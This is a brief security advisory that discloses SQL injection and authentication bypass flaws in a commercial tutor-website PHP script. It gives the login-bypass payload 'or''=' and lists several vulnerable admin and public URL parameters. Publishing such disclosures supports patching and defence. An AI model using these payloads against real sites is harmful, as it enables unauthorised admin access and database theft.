My Private Tutor Website Builder Script SQL Injection
Posted on 19 January 2017
# # # # # Vulnerability: SQL Injection + Authentication Bypass # Date: 18.01.2017 # Vendor Homepage: http://www.scriptgiant.com/ # Script Name: My Private Tutor Website Builder Script # Script Buy Now: http://www.popularclones.com/products/My-Private-Tutor-Website-Builder # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Authentication Bypass : # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter. # SQL Injection/Exploit : # http://localhost/[PATH]/admin/page.editor.php?id=[SQL] # http://localhost/[PATH]/admin/add_cat.php?id=[SQL] # http://localhost/[PATH]/admin/add_subcat.php?id=[SQL] # http://localhost/[PATH]/find_group_class.php?cat_id=[SQL] # http://localhost/[PATH]/join_class.php?course_id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. # # # # #
